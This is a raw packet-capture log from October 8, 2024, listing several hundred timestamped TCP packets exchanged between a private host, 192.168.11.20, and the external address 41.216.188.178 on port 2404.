                                                                                                                                                                                  Oct 8, 2024 16:52:35.613276958 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613300085 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613430023 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613470078 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613625050 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613756895 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613811016 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613944054 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614062071 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614150047 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614209890 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614324093 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614439964 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614490032 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614578962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614696980 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614780903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614828110 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614870071 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.614940882 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615000010 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615045071 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615117073 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615231037 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615304947 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615396023 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615408897 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615551949 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615617990 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615684032 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615739107 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.615786076 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.662187099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797524929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797624111 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797704935 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797775030 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797837019 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797899961 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797911882 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.797996044 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798055887 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798069954 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798137903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798194885 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798238039 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798273087 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798331022 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798377037 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798412085 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798412085 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798470974 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798527956 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798580885 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798751116 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.798914909 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.799063921 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.799252033 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.799437046 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800425053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800529003 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800597906 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800654888 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800715923 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800729990 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800817966 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800879002 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800894022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800894022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.800965071 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801023960 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801064014 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801111937 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801172972 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801232100 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801292896 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801348925 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801409006 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801417112 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801417112 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801493883 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801553011 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801574945 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801635027 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801666021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801723957 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801781893 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801830053 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801857948 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801914930 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.801973104 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802000999 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802160978 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802174091 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802247047 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802304029 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802340984 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802386045 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802442074 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802496910 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802509069 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802583933 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802640915 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802695990 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802731037 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802731037 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802900076 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.802941084 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803000927 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803078890 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803174973 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803272963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803369045 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803416967 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803416967 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803550005 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803651094 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803769112 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803814888 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803919077 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.803985119 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804074049 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804239035 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804325104 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804399014 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804538965 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804671049 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804683924 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804811954 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.804934978 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805011034 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805100918 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805175066 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805272102 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805404902 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805533886 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805550098 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805682898 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805742979 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805855036 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.805970907 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806024075 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806127071 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806263924 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806364059 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806432962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806580067 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806698084 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806711912 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806834936 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806878090 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806878090 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.806977987 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807044029 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807051897 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807121038 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807183027 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807214022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807214022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807334900 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807384968 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807384968 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807495117 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807553053 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807631016 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807696104 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807720900 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807785034 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807877064 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807894945 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.807991028 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808058023 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808067083 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808067083 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808067083 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808157921 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808231115 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808299065 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808357000 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808399916 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808399916 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808449030 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808506012 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808561087 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808572054 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808640003 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808695078 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808746099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808746099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808746099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808798075 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808856010 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808913946 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808921099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.808988094 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809045076 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809081078 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809081078 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809135914 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809191942 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809251070 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809258938 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809258938 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809334993 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809391022 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809420109 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809420109 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809480906 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809537888 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809590101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809590101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809623957 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809684038 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809741020 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809760094 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809760094 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809828997 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809885979 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809931040 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809931040 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.809976101 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810033083 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810089111 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810100079 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810100079 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810100079 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810185909 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810241938 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810269117 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810323954 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810379982 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810439110 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810447931 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810534000 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810576916 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810609102 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810657024 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810713053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810767889 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810782909 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810784101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810784101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810868979 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810925007 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.810955048 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811012030 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811069965 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811120987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811175108 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811240911 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811297894 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811352968 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811377048 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811378002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811378002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811451912 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811505079 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811546087 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811585903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811640978 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811696053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811717987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811717987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811718941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811718941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811805010 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811861992 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811888933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.811963081 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812020063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812041998 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812099934 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812155962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812218904 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812218904 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812295914 CEST24044973741.216.188.178192.168.11.20
